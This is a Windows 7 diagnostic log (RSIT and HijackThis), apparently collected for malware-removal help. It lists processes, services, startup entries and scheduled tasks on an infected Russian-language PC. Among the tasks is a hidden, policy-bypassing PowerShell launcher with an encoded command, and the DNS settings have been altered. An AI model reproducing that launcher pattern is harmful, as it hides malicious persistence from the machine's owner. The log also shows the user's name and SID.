Logfile of random's system information tool 1.12 (written by random/random)
Run by Владислав at 2016-04-14 11:41:45
Microsoft Windows 7 Максимальная  Service Pack 1
System partition C: size 11 GB (18%) Free 60 GB
Total RAM: 4023 MB (57% free)
X64

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 11:41:45, on 14.04.2016
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.16428)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BaiduProtect.exe
C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\lpclient.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files (x86)\Media Saver\Basement\MSLSService.exe
C:\Windows\SysWOW64\PnkBstrA.exe
C:\Windows\SysWOW64\svchost.exe
C:\Program Files (x86)\Media Saver\Basement\MSLServer.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Users\Владислав\Desktop\AutoLogger\AutoLogger.exe
C:\Users\Владислав\Desktop\AutoLogger\AutoLogger\AVZ\avz.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\PROGRA~2\Opera\36.0.2130.46\opera_crashreporter.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\PROGRA~2\Opera\36.0.2130.46\opera.exe
C:\Users\Владислав\Desktop\AutoLogger\AutoLogger\RSIT\Владислав_RSITx64.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yandex.ru/?win=213&clid=1985535-216
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: MSaver - {12E8A6C2-B125-479F-AB3C-13B8757C7F04} - (no file)
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [GenieFloater] C:\Program Files (x86)\Genie Soft\Genie Cleaner\GenieFloater.exe
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O8 - Extra context menu item: &Экспорт в Microsoft Excel - res://C:\PROGRA~2\MICROS~1\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: (no name) - {8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no file)
O9 - Extra button: Справочные материалы - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~1\OFFICE11\REFIEBAR.DLL
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O17 - HKLM\System\CCS\Services\Tcpip\..\{2EE19065-9E2C-4E5F-B133-74B195023039}: NameServer = 195.38.33.2,195.38.32.3
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: NameServer = 82.163.142.5 95.211.158.132
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: NameServer = 82.163.142.5 95.211.158.132
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 82.163.142.5 95.211.158.132
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: BDSGRTP Service (BDSGRTP) - ????????(??)???? - C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BaiduProtect.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Служба Google Update (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (file missing)
O23 - Service: Служба Google Update (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Local Policy Client - Unknown owner - C:\Windows\SysWOW64\lpclient.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: MSLSService - Unknown owner - C:\Program Files (x86)\Media Saver\Basement\MSLSService.exe
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 7684 bytes

======Process list======



\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
winlogon.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
"C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BaiduProtect.exe" -r
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
atieclxx
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe" /service
"taskhost.exe"
taskeng.exe {F57529CA-A9DC-4295-8751-6EB769AD3F25}
"C:\Windows\system32\Dwm.exe"
"C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe" /service
C:\Windows\Explorer.EXE
C:\Windows\SysWOW64\svchost.exe -k netsvcs
C:\Windows\SysWOW64\svchost.exe -k Intel(R)
"C:\Windows\SysWOW64\lpclient.exe" /Svc
"C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE"
"C:\Program Files (x86)\Media Saver\Basement\MSLSService.exe"
C:\Windows\SysWOW64\PnkBstrA.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\SysWOW64\svchost.exe -k AudioDrv
C:\Windows\System32\alg.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files (x86)\Media Saver\Basement\MSLServer.exe"
"C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
"C:\Windows\System32\WUDFHost.exe" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:HostProcess-1b1a22fd-2a1d-42a2-97c7-afcf104eeec9 -SystemEventPortName:HostProcess-8ffe7498-e58a-41f7-93b7-cc27ebfb044f -IoCancelEventPortName:HostProcess-9bec6e40-4ad2-4c63-a774-a5f6c83ace56 -NonStateChangingEventPortName:HostProcess-ec9d80fa-097e-4487-89af-44088c5fb392 -ServiceSID:S-1-5-80-2652678385-582572993-1835434367-1344795993-749280709 -LifetimeId:dcf22c91-1434-4938-a639-9cc12c1938d0 -DeviceGroupId:WpdFsGroup
C:\Windows\system32\SearchIndexer.exe /Embedding
"C:\Users\Владислав\Desktop\AutoLogger\AutoLogger.exe" 
"C:\Users\Владислав\Desktop\AutoLogger\AutoLogger\AVZ\avz.exe" Script=AVZ\GeneralScript.txt HiddenMode=0
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://google.ru
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" -noautoupdate --ran-launcher -- http://google.ru/
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2628 CREDAT:275457 /prefetch:2
"C:\PROGRA~2\Opera\36.0.2130.46\opera_crashreporter.exe" -noautoupdate --ran-launcher --crash-reporter-parent-id=2880 -- http://google.ru/
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=gpu-process --channel="2880.0.2119134540\1663165305" --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --supports-dual-gpus=false --gpu-driver-bug-workarounds=3,14,31,60 --gpu-vendor-id=0x1002 --gpu-device-id=0x68d9 --gpu-driver-vendor="Advanced Micro Devices, Inc." --gpu-driver-version=13.200.0.0 --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --ignored=" --type=renderer "
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --extension-process --enable-webrtc-hw-h264-encoding --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.2.1363566271\188403658"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --extension-process --enable-webrtc-hw-h264-encoding --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.3.617472246\1563225620"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --extension-process --enable-webrtc-hw-h264-encoding --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.4.1429595856\244991037"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.5.751183880\449359839"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.10.1932977831\1974985451"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.13.1026235624\1530003683"
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=ppapi --channel="2880.15.751496515\2138858163" --ppapi-flash-args --lang=ru --device-scale-factor=1 --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --ignored=" --type=renderer "

C:\Windows\System32\svchost.exe -k WerSvcGroup
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" 
"C:\Windows\system32\SearchFilterHost.exe" 0 520 524 532 65536 528 
C:\Windows\system32\wbem\wmiprvse.exe
C:\Users\Владислав\Desktop\AutoLogger\AutoLogger\RSIT\RSITx64.exe /silent /m3 /autolog /logfolder "C:\Users\Владислав\Desktop\AutoLogger\AutoLogger\RSIT\Log"

======Scheduled tasks folder======

C:\Windows\tasks\Adobe Flash Player PPAPI Notifier.job - C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe -check pepperplugin
C:\Windows\tasks\Adobe Flash Player Updater.job - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe 
C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000Core.job - C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /c
C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000UA.job - C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
C:\Windows\tasks\GVMTKIX.job - C:\Users\Владислав\AppData\Roaming\GVMTKIX.exe /infocmdline=
C:\Windows\tasks\MagicKeys.job - c:\programdata\{6ef5c04c-c64c-f075-6ef5-5c04cc640133}\3113341408602753693e.exe --startup=1 --single
C:\Windows\tasks\Update Service for Media Saver.job - C:\Program Files (x86)\Media Saver\8W7crcC.exe 
C:\Windows\tasks\Update Service for Media Saver2.job - C:\Program Files (x86)\Media Saver\8W7crcC.exe 
C:\Windows\tasks\Update Service for VK Downloader.job - C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 
C:\Windows\tasks\Update Service for VK Downloader2.job - C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 
C:\Windows\tasks\Обновление Браузера Яндекс .job - C:\Users\Владислав\AppData\Local\Yandex\YandexBrowser\Application\browser.exe  --background-update
C:\Windows\system32\tasks\Adobe Flash Player PPAPI Notifier - C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe -check pepperplugin
C:\Windows\system32\tasks\Adobe Flash Player Updater - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe 
C:\Windows\system32\tasks\GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000Core - C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /c
C:\Windows\system32\tasks\GoogleUpdateTaskUserS-1-5-21-1059553410-1956651935-2154180951-1000UA - C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
C:\Windows\system32\tasks\Kometa up - C:\Users\Владислав\AppData\Local\Kometa\kometaup.exe 
C:\Windows\system32\tasks\MailRuUpdateTask - C:\Users\Владислав\AppData\Local\Mail.Ru\MailRuUpdater.exe --scheduler
C:\Windows\system32\tasks\Opera scheduled Autoupdate 1389276660 - C:\PROGRA~2\Opera\launcher.exe --scheduledautoupdate $(Arg0)
C:\Windows\system32\tasks\Style Mart - C:\Windows\system32\rundll32.exe "C:\Users\Владислав\AppData\Local\Style Mart\Bin\StyleMart.dll",#3
C:\Windows\system32\tasks\Update Service for VK Downloader - C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 
C:\Windows\system32\tasks\Update Service for VK Downloader2 - C:\Program Files (x86)\VK Downloader\kfCFztp.exe.exe 
C:\Windows\system32\tasks\ZetaUpdate - C:\Program Files (x86)\ZetaGames\Upd.exe
C:\Windows\system32\tasks\{0A0B0B47-7D0A-0D7D-0B11-7E7D0F0A110A} - C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand
C:\Windows\system32\tasks\Microsoft\Windows Defender\MP Scheduled Scan - c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan
C:\Windows\system32\tasks\Microsoft\Windows\WindowsBackup\ConfigNotification - %systemroot%\System32\sdclt.exe /CONFIGNOTIFICATION
C:\Windows\system32\tasks\Microsoft\Windows\Windows Media Sharing\UpdateLibrary - "%ProgramFiles%\Windows Media Player\wmpnscfg.exe" 
C:\Windows\system32\tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange - %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
C:\Windows\system32\tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting - %windir%\system32\wermgr.exe -queuereporting
C:\Windows\system32\tasks\Microsoft\Windows\UPnP\UPnPHostConfig - sc.exe config upnphost start= auto
C:\Windows\system32\tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime - %windir%\system32\sc.exe start w32time task_started
C:\Windows\system32\tasks\Microsoft\Windows\Tcpip\IpAddressConflict1 - %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem
C:\Windows\system32\tasks\Microsoft\Windows\Tcpip\IpAddressConflict2 - %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem
C:\Windows\system32\tasks\Microsoft\Windows\SystemRestore\SR - %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
C:\Windows\system32\tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask - sc.exe start sppsvc
C:\Windows\system32\tasks\Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask - %windir%\system32\RAServer.exe /offerraupdate
C:\Windows\system32\tasks\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem - %SystemRoot%\System32\powercfg.exe -energy -auto
C:\Windows\system32\tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo - %windir%\system32\gatherNetworkInfo.vbs 
C:\Windows\system32\tasks\Microsoft\Windows\MUI\LPRemove - %windir%\system32\lpremove.exe 
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch - %SystemRoot%\ehome\ehPrivJob.exe /DoActivateWindowsSearch
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService - %SystemRoot%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks - %SystemRoot%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\ehDRMInit - %SystemRoot%\ehome\ehPrivJob.exe /DRMInit
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\InstallPlayReady - %SystemRoot%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\mcupdate - %SystemRoot%\ehome\mcupdate $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\mcupdate_scheduled - %SystemRoot%\ehome\mcupdate -crl -hms -pscn 15
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask - %SystemRoot%\ehome\mcupdate.exe -MediaCenterRecoveryTask
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask - %SystemRoot%\ehome\mcupdate.exe -ObjectStoreRecoveryTask
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\OCURActivate - %SystemRoot%\ehome\ehPrivJob.exe /OCURActivate
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\OCURDiscovery - %SystemRoot%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PBDADiscovery - %SystemRoot%\ehome\ehPrivJob.exe /PBDADiscovery
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 - %SystemRoot%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 - %SystemRoot%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PeriodicScanRetry - %windir%\ehome\MCUpdate.exe -pscn 0
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PvrRecoveryTask - %SystemRoot%\ehome\mcupdate.exe -PvrRecoveryTask
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PvrScheduleTask - %SystemRoot%\ehome\mcupdate.exe -PvrSchedule
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\RecordingRestart - %SystemRoot%\ehome\ehrec /RestartRecording
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\RegisterSearch - %SystemRoot%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\ReindexSearchRoot - %SystemRoot%\ehome\ehPrivJob.exe /DoReindexSearchRoot
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask - %SystemRoot%\ehome\mcupdate.exe -SqlLiteRecoveryTask
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\StartRecording - %SystemRoot%\ehome\ehrec /StartRecording
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\UpdateRecordPath - %SystemRoot%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Location\Notifications - %windir%\System32\LocationNotifications.exe 
C:\Windows\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector - %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
C:\Windows\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver - %windir%\system32\DFDWiz.exe 
C:\Windows\system32\tasks\Microsoft\Windows\Defrag\ScheduledDefrag - %windir%\system32\defrag.exe -c
C:\Windows\system32\tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator - %SystemRoot%\System32\wsqmcons.exe 
C:\Windows\system32\tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask - BthUdTask.exe $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Autochk\Proxy - %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
C:\Windows\system32\tasks\Microsoft\Windows\Application Experience\AitAgent - aitagent 
C:\Windows\system32\tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater - %windir%\system32\rundll32.exe aepdu.dll,AePduRunUpdate
C:\Windows\system32\tasks\Microsoft\Windows\AppID\PolicyConverter - %windir%\system32\appidpolicyconverter.exe 
C:\Windows\system32\tasks\Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck - %windir%\system32\appidcertstorecheck.exe 

=========Google Chrome=========

C:\Users\Владислав\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Extension ahfgeienlihckogmohjhadlkjgocpleb 1 Интернет-магазин Chrome 0.2
Extension bepbmhgboaologfdajaanbcjmnhjmhfn 0  
Extension bfchgcbmheebfgccmphpabmjmiphgafa 1  
Extension bgcifljfapbhgiehkjlckfjmgeojijcb 1 Поиск Mail.Ru 7.0.2
Extension bgknpfancpeamejmcooedljjnaddldhg 0 Домашняя страница Mail.Ru 2.0.1
Extension blpcfgokakmgnkcojhhkbfbldkacnbeo 1 YouTube 4.2.8
Extension coobgpohoikkiipiblmjeljniedjpjpf 1 Google Search 0.0.0.60
Extension dkekdlkmdpipihonapoleopfekmapadh 0 Стартовая — Яндекс 1.2.9.2
Extension eemcgdkfndhakfknompkggombfjjjeno 1 Bookmark Manager 0.1
Extension ehloibeiaffhibffchiobihgcainmcep 1  
Extension eioddfaepdoeifbhjphfefgipcjcdieo 1 Поиск Mail.Ru 7.0.2
Extension ennkphjdgehloodpbhlhldgbnhmacadg 1 Settings 0.2
